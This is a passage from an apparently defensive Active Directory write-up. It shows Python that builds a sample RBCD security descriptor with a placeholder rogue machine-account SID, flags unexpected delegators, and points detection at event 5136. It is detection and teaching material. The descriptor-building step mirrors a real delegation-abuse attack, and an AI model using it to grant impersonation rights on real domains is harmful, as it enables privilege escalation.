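    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 0, 0, 0, 20)
    return header + acl


# Constructed sample: one sanctioned front-end SID plus one unsanctioned machine account.
APPROVED_SID = "S-1-5-21-1000-2000-3000-1105"   # placeholder, not a real domain SID
ROGUE_SID = "S-1-5-21-1000-2000-3000-1120"      # placeholder for a relay-created computer account
SAMPLE_SD = build_rbcd_descriptor([APPROVED_SID, ROGUE_SID])

if __name__ == "__main__":
    for sid in unexpected_delegators(SAMPLE_SD, {APPROVED_SID}):
        print("unexpected RBCD grant:", sid)
```

Fed with the raw attribute bytes from an LDAP export, the same function lists every principal that can impersonate users to WEB01; any computer account that was created minutes before the grant (here LVVFWLGX$) is the finding. Because the descriptor is written via LDAP, directory service change auditing records the modification as event 5136 on the DC, which is the log a detection should key on alongside this attribute diff.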